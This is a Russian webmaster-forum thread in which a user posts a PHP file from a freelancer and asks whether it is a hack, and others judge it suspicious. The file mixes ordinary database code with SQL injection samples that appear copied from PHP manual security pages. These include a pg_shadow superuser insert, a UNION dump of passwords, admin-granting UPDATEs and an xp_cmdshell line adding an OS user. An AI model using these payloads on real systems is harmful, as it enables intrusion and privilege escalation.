Фрилансер вместе с работой скинул файл в котором вот такой подозрительный код, что это?
Страницы: 1
Фрилансер вместе с работой скинул файл в котором вот такой подозрительный код, что это?
Что значит этот короткий код в файле, я так понимаю это взлом сервера?

<?php
$servername = $host;
$database = $db; 
$username = $name;
$password = $pass;

$sql = "mysql:host=$servername;dbname=$database;";
$dsn_Options = [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION];


try { 
  $my_Db_Connection = new PDO($sql, $username, $password, $dsn_Options);
  echo "Connected successfully";
} catch (PDOException $error) {
  echo 'Connection error: ' . $error->getMessage();
}


$my_Insert_Statement = $my_Db_Connection->prepare("INSERT INTO catalog (name, lastname, email) VALUES (:first_name, :last_name, :email)");

$my_Insert_Statement->bindParam(:first_name, $first_Name);
$my_Insert_Statement->bindParam(:last_name, $last_Name);
$my_Insert_Statement->bindParam(:email, $email);

if ($my_Insert_Statement->execute()) {
  echo "OK";
} else {
  echo "Error";
}
$my_Insert_Statement->execute();


if ($my_Insert_Statement->execute()) {
  echo "OK";
} else {
  echo "Error";
}

$offset = $argv[0]; 
$query  = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($conn, $query);

insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
    select 'crack', usesysid, 't','t','crack'
    from pg_shadow where usename='postgres';$query  = "SELECT id, name, inserted, size FROM products
           WHERE size = '$size'";
$result = odbc_exec($conn, $query);


union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;


// $uid: ' or uid like '%admin%
$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%';";

// $pwd: hehehe', trusted=100, admin='yes
$query = "UPDATE usertable SET pwd='hehehe', trusted=100, admin='yes' WHERE
...;";

$query  = "SELECT * FROM products
           WHERE id LIKE '%a%'
           exec master..xp_cmdshell 'net user test testpass /ADD' --%'";
$result = mssql_query($query);


//Establishes the connection
$conn = sqlsrv_connect($serverName, $connectionOptions);
$tsql= "SELECT TOP 20 pc.Name as CategoryName, p.name as ProductName
        FROM [SalesLT].[ProductCategory] pc
        JOIN [SalesLT].[Product] p
     ON pc.productcategoryid = p.productcategoryid";
$getResults= sqlsrv_query($conn, $tsql);
echo ("Reading data from table" . PHP_EOL);
if ($getResults == FALSE)
    echo (sqlsrv_errors());
while ($row = sqlsrv_fetch_array($getResults, SQLSRV_FETCH_ASSOC)) {
 echo ($row['CategoryName'] . " " . $row['ProductName'] . PHP_EOL);
}
sqlsrv_free_stmt($getResults);

?>

Бесплатная контекстная реклама

Ну на вскидку код в БД сбрасывает каких-то юзверей (по паролям) и устанавливает кому-то из них пароль 'crack' или 'hehehe', а также права админа. Но это очень приблизительно.
Кому-нибудь другому очень просто рассказать, как надо жить и что делать. Я бы любому все объяснил. И даже показал бы, к каким огням лететь и как. А если то же самое надо делать самому, сидишь на месте или летишь совсем в другую сторону. © В. П.
Можно много чего предполагать, уточнили бы. Похоже увязаны как то товары и пользователи, может сброс пароля для редактирования товаров пользователя.. На этапе разработки какие то вещи тестируются отдельно, иногда в отдельных файлах.. зачем оно скажет тот кто делал
Вот несколько статей, они и натолкнули меня на мысль что этот код подозрителен https://studwood.ru/1047029/informatika/vnedrenie        https://konyakov.ru/pubs/php/php7/security.database.sql-injection.html
Очень подозрительный код, похоже на шелл.

★★★★★

inwoxer.ru - копии сайтов 300 руб, создание сайтов 900 руб, https сертификаты, раскрутка инстаграм 200 руб и другие услуги по СОЧНЫМ ценам. 
NEW! СЕО аудит 400 руб и прогон Твиттер 300 руб

★★★★★
А я искала помощь в раскрутке - (затёр)
Изменено: Prapovednik - 15 Августа 2018 10:14 (затёр)
Вот еще одну статью нашел с этим кодом http://php.net/manual/ru/security.database.sql-injection.php

Вообщем на мой вопрос для чего нужен этот файл, фрилансер сказал что  "файл этот вносит правки в базу данных, добавляя, обновляя, очищая ее"


Не знаю для чего это все ему нужно.

Вы будете сильно удивлены но это один из Пользователей данного форума, он здесь предоставляет свои услуги.... И возможно он даже прочитал эту тему)
Цитата
Иван Петров пишет:
фрилансер сказал что "файл этот вносит правки в базу данных, добавляя, обновляя, очищая ее"
врёт
Цитата
Иван Петров пишет:
Вы будете сильно удивлены но это один из Пользователей данного форума
Ну а чего удивляться-то, это обычный форум, и детектор лжи при регистрации тут никому проходить не надо.
У него здесь длинная тема с года 2013 и много отзывов, неприятная ситуация
Безопасный код со словами crack и вот этим вот UPDATE usertable SET pwd='hehehe', trusted=100, admin='yes' WHERE ??? Да ну нафиг.
Цитата
Иван Петров пишет:
У него здесь длинная тема с года 2013 и много отзывов, неприятная ситуация


Может тогда опубликуете ссылку на тему исполнителя?smile:)
Самый интересный участок:

Код
$query  = "SELECT * FROM products 
           WHERE id LIKE '%a%' 
           exec master..xp_cmdshell 'net user test testpass /ADD' --%'"; 
$result = mssql_query($query); 


Создает в системе юзера "test", пароль "testpass", ну а дальше дело повышения привилегий, что как правило, опытному специалисту не составляет труда.
людмила василюк, бан. затёр
Страницы: 1
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:12 Не растет трафик с гугла, в чем может быть причина? 
15:09 Новый фильтр яндекса и выпадание из индекса сайтов юкоза 
14:46 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
10:41 Неинформативное бесполезное содержание на сетку видеосайтов 
10:01 Нет трафика и позиций в яндексе 
10:00 Настройка 301 редиректа 
09:52 АП - 25.12.18 - ИКС 
13:51 Прогон по личной базе, больше 1000 трастовых сайтов! Продвижение СЧ и НЧ запросов + рост показателей! Гарантии! 
09:31 Продвину сайт качественными ссылками. Рост посещаемости, позиций и ИКС. Крауд ссылки недорого + скидки. 
08:25 Комплексный прогон по собственным и проверенным базам. 
01:27 Анализ курсов и недежности обменников - Kurs.Expert 
23:26 Восстанавливаю Целиком и Полностью сайты из Вебархива (Webarchive) 
21:01 Zinsta - Программа для раскрутки и продвижения instagram 
20:26 Услуги постинга в социальные сети для продвижения, индексации и увеличения социальной активности 
10:38 Новая тизерная сеть Actionteaser.ru 
10:26 Посоветуйте обменник электронных денег. 
08:53 Провожу бесплатные аудиты сайтов, консультации, сбор семантических ядер 
14:11 Оптимизация сайтов, продвижение, наращивание ссылок. Большой опыт работы, отзывы 
13:22 Кому пришла выплата с AdSense? 
11:01 Lucky.Online - собственные офферы, КЦ 24/7, стабильно высокий апрув 
07:27 Что лучше Adsense или РСЯ?